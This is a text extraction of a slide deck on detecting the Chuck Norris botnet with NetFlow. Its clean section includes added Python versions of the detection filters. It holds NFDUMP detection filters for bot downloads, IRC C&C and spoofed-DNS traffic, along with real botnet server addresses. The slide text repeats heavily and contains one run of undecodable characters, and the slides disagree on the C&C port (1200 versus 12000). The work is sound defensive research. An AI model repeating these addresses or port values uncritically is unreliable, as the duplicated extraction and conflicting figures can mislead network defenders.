BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
[diagram: cndetdb.pm in the middle, backed by PostgreSQL and fed by NetFlow data, DNS and the WHOIS db; the detection methods are added one by one]
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Krmíček, Plesník: Detecting Botnets with NetFlow, 23/28
Web Interface – Infected Host Detected
[screenshot of the plugin's NfSen web interface showing a detected infected host]
Krmíček, Plesník: Detecting Botnets with NetFlow, 24/28
Part V
Conclusion
Krmíček, Plesník: Detecting Botnets with NetFlow, 25/28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
  scanning for possible bots
  infection of a vulnerable device
  bot initialization/update
  botnet operation
Botnet Detection Plugin Customization
  modular plugin engine
  easy modification for detection of other botnets
  we need to customize detection methods
  plugin distributed under the BSD license
Krmíček, Plesník: Detecting Botnets with NetFlow, 26/28
Conclusion
Network Devices Are Not Protected
  Routers, access points, printers, cameras, TVs, ...
  No AV software, missing patches and firmware updates
  But they should be protected!
Experience
  NetFlow can monitor all such devices in the network
  Discovery of the new Chuck Norris botnet using NetFlow
  Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
  Chuck Norris is down, but others are coming (e.g. Stuxnet)
  We are open to research collaboration
  Detection plugin is available at our project site
Krmíček, Plesník: Detecting Botnets with NetFlow, 27/28
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Krmíček, Plesník: Detecting Botnets with NetFlow, 28/28
Connections to Botnet Distribution Sites – Phase II
Bot's web download requests from infected host
[diagram: infected device in the local network opening TCP/80 connections (SYN+ACK flags) to three botnet distribution web servers]
NFDUMP detection filter:
(src net local_network) and (dst ip web_servers¹) and (dst port 80) and (proto TCP) and (flags SA and not flag R)
¹ IP addresses of the attacker's botnet distribution web servers
Krmíček, Plesník: Detecting Botnets with NetFlow, 15/28
Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with command and control center
[diagram: infected device in the local network opening a TCP/1200 connection (SYN+ACK flags) to the botnet C&C server]
NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server²) and (dst port 1200) and (proto TCP) and (flags SA and not flag R)
² IP address of the attacker's IRC server (botnet C&C center)
Krmíček, Plesník: Detecting Botnets with NetFlow, 16/28
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
  Common DNS requests forwarded to OpenDNS servers
  Targeted DNS requests forwarded to the attacker's spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
  E.g. Facebook or banking sites
[diagram: infected device in the local network sending UDP/53 queries to an OpenDNS server and to the spoofed DNS server]
NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS servers³) or (dst ip DNS servers⁴)) and (proto UDP) and (dst port 53)
³ IP addresses of the common OpenDNS servers
⁴ IP addresses of the attacker's spoofed DNS servers
Krmíček, Plesník: Detecting Botnets with NetFlow, 17/28
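The three NFDUMP filters of Phases II to IV, re-expressed in Python over nfdump-style CSV flow records so they can be run offline and checked against sample data. This is an added example, not code from the slides or from the authors' NfSen plugin. The local prefix, the host addresses and the flow lines are constructed, and the CSV column set (ts, sa, da, pr, dp, flg) is a reduced one; the server addresses are the ones listed on the deck's "Detected Chuck Norris Servers" slide with their dots restored. The Phase III filter on the slide uses dst port 1200 while the server table lists 12000, so the port is kept as a single parameter. The correlate() step goes beyond the slides: it groups hits per host, which is how an analyst would rank candidates before looking at the web interface.

```python
"""Phase II-IV NFDUMP filters as Python predicates over nfdump-like CSV flows.

Added example (not the Krmíček/Plesník plugin). Prefix, hosts and flow
lines are constructed; server addresses come from the deck's server slide.
"""
import csv
import ipaddress
from dataclasses import dataclass
from io import StringIO

# Constructed prefix standing in for `local_network` in the filters.
LOCAL_NETWORK = ipaddress.ip_network("10.20.0.0/16")

# Deck values. IRC_PORT follows the Phase III filter (dst port 1200); the
# deck's server table says 12000, so it is one parameter to adjust.
WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}          # web_servers (1)
IRC_SERVER = "87.98.173.190"                              # IRC_server (2)
IRC_PORT = 1200
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}    # OpenDNS servers (3)
SPOOFED_DNS_SERVERS = {"87.98.163.86"}                    # attacker's DNS servers (4)


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dst_port: int
    flags: str  # nfdump flag string in U A P R S F order, e.g. ".AP.S."

    def has_flag(self, letter):
        return letter in self.flags


def parse_flows(csv_text):
    """Parse the constructed nfdump-like CSV (columns ts,sa,da,pr,dp,flg)."""
    return [Flow(r["sa"], r["da"], r["pr"], int(r["dp"]), r["flg"])
            for r in csv.DictReader(StringIO(csv_text))]


def is_local(addr):
    return ipaddress.ip_address(addr) in LOCAL_NETWORK


def syn_ack_no_rst(f):
    # (flags SA and not flag R): handshake completed and not reset, so the
    # bot actually reached the server rather than merely probing it.
    return f.has_flag("S") and f.has_flag("A") and not f.has_flag("R")


def phase2_distribution_site(f):
    # (src net local_network) and (dst ip web_servers) and (dst port 80)
    # and (proto TCP) and (flags SA and not flag R)
    return (is_local(f.src) and f.dst in WEB_SERVERS and f.dst_port == 80
            and f.proto == "TCP" and syn_ack_no_rst(f))


def phase3_cc_center(f):
    # (src net local_network) and (dst ip IRC_server) and (dst port 1200)
    # and (proto TCP) and (flags SA and not flag R)
    return (is_local(f.src) and f.dst == IRC_SERVER and f.dst_port == IRC_PORT
            and f.proto == "TCP" and syn_ack_no_rst(f))


def phase4_dns_spoofing(f):
    # (src net local_network) and ((dst ip OpenDNS servers) or (dst ip DNS
    # servers)) and (proto UDP) and (dst port 53)
    return (is_local(f.src)
            and (f.dst in OPENDNS_SERVERS or f.dst in SPOOFED_DNS_SERVERS)
            and f.proto == "UDP" and f.dst_port == 53)


FILTERS = {
    "phase2_distribution_site": phase2_distribution_site,
    "phase3_cc_center": phase3_cc_center,
    "phase4_dns_spoofing": phase4_dns_spoofing,
}


def detect(flows):
    """Map each phase to the sorted local hosts whose flows matched it."""
    hits = {name: set() for name in FILTERS}
    for f in flows:
        for name, rule in FILTERS.items():
            if rule(f):
                hits[name].add(f.src)
    return {name: sorted(hosts) for name, hosts in hits.items()}


def correlate(hits):
    """Invert detect(): host -> sorted phases it matched (extension of the
    slides; a host seen in several phases is the stronger candidate)."""
    by_host = {}
    for phase, hosts in hits.items():
        for h in hosts:
            by_host.setdefault(h, []).append(phase)
    return {h: sorted(p) for h, p in sorted(by_host.items())}


# Constructed flow records; 10.20.9.9's TCP/80 flow carries RST and the
# 192.0.2.44 flow is not from the local prefix, so neither should match.
SAMPLE_FLOWS = """\
ts,sa,da,pr,dp,flg
2011-01-12 10:00:01,10.20.5.7,87.98.173.190,TCP,80,.AP.SF
2011-01-12 10:00:02,10.20.5.7,87.98.173.190,TCP,1200,.AP.S.
2011-01-12 10:00:03,10.20.5.7,87.98.163.86,UDP,53,......
2011-01-12 10:00:04,10.20.9.9,87.98.163.86,TCP,80,.A.RS.
2011-01-12 10:00:05,10.20.9.9,208.67.222.222,UDP,53,......
2011-01-12 10:00:06,192.0.2.44,87.98.173.190,TCP,80,.AP.SF
2011-01-12 10:00:07,10.20.5.7,198.51.100.10,TCP,80,.AP.SF
"""

if __name__ == "__main__":
    for host, phases in correlate(detect(parse_flows(SAMPLE_FLOWS))).items():
        print(host, "->", ", ".join(phases))
```

The flag test is the part worth copying: matching on SYN and ACK without RST keeps only sessions the server accepted, which is what separates a bot that fetched its payload from a host that merely tried to. Which registry and addresses to load belongs in configuration, as the deck's "IP address updates are published at the project page" implies.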
ADSL String Detection
Looking for ADSL String
  ADSL string indicates Chuck Norris botnet
  Searching in victim's hostname or victim's WHOIS
  Querying DNS server and parsing received hostname
  Querying WHOIS database and parsing received info
[screenshot: DNS/WHOIS lookup output in which the string "adsl" appears in the resolved hostname]
Krmíček, Plesník: Detecting Botnets with NetFlow, 18/28
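The ADSL string check from this slide, written out so both sources it names (the victim's reverse-DNS hostname and its WHOIS record) are parsed by pure functions that run offline. This is an added example and not the authors' plugin code. The hostnames and the WHOIS excerpt are constructed; lookup_adsl_evidence() is the only part that touches the network, using a PTR lookup and a minimal WHOIS client on TCP/43, and the registry server name is an assumption (which registry holds a given address depends on its region).

```python
"""ADSL string detection over a hostname and a WHOIS record.

Added example (not the Krmíček/Plesník plugin). Sample hostnames and the
WHOIS excerpt are constructed; the WHOIS server is an assumed default.
"""
import re
import socket

ADSL_PATTERN = re.compile(r"adsl", re.IGNORECASE)


def hostname_has_adsl(hostname):
    """True when the resolved hostname contains the ADSL string."""
    return bool(hostname) and ADSL_PATTERN.search(hostname) is not None


def whois_fields_with_adsl(whois_text):
    """Return (key, value) pairs of WHOIS lines whose value mentions ADSL.
    Comment lines (% or #) are skipped so a registry banner cannot match."""
    hits = []
    for line in whois_text.splitlines():
        line = line.strip()
        if not line or line[0] in "%#":
            continue
        key, sep, value = line.partition(":")
        if sep and ADSL_PATTERN.search(value):
            hits.append((key.strip().lower(), value.strip()))
    return hits


def classify(hostname, whois_text):
    """Which of the two sources on the slide carried the ADSL string."""
    reasons = []
    if hostname_has_adsl(hostname):
        reasons.append("hostname")
    if whois_fields_with_adsl(whois_text):
        reasons.append("whois")
    return reasons


def reverse_lookup(ip):
    """PTR lookup; an unresolvable address yields an empty hostname."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return ""


def whois_query(ip, server="whois.ripe.net", timeout=5.0):
    """Minimal RFC 3912 client: send the query line, read until EOF.
    The default server is an assumption; pick the registry for your region."""
    try:
        with socket.create_connection((server, 43), timeout=timeout) as s:
            s.sendall(f"{ip}\r\n".encode())
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode("utf-8", "replace")
    except OSError:
        return ""


def lookup_adsl_evidence(ip):
    """Live version of the check (needs network access)."""
    return classify(reverse_lookup(ip), whois_query(ip))


# Constructed WHOIS excerpt; the comment line mentions ADSL on purpose to
# show that banner text is ignored and only real fields count.
SAMPLE_WHOIS = """\
% constructed excerpt (this ADSL mention is a comment and must be ignored)
inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-ADSL-POOL
descr:          Example ISP dynamic ADSL customers
country:        ZZ
"""

if __name__ == "__main__":
    print(classify("dsl-12-34.adsl.example.net", SAMPLE_WHOIS))
    print(classify("host-12-34.cable.example.net", ""))
```

The string marks the device class the bot goes after, so on its own it is corroboration for the flow-based phases rather than a verdict; the plugin lists it as one of five methods for that reason. Skipping comment lines matters in practice: registry output routinely starts with free-text banners that would otherwise match.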
Detected Chuck Norris Servers
Known IP Addresses
  Web server addresses: 87.98.173.190, 87.98.163.86
  IRC server addresses: 87.98.173.190, 87.98.163.86
  IRC server port: 12000
  OpenDNS server addresses: 208.67.222.222, 208.67.220.220
  Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default
IP address updates are published at the project page
Krmíček, Plesník: Detecting Botnets with NetFlow, 19/28
Part IV
NfSen Botnet Detection Plugin
Krmíček, Plesník: Detecting Botnets with NetFlow, 20/28
Botnet Detection Plugin
Plugin Features
  Detects Chuck Norris-like botnet behavior
  Based on NetFlow and other network data sources
  Processes data regularly and provides real-time output
Plugin Architecture
  Compliant with NfSen plugin architecture recommendations
  PHP frontend with a Perl backend and a PostgreSQL DB
  Web, e-mail and syslog detection output and reporting
Krmíček, Plesník: Detecting Botnets with NetFlow, 21/28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
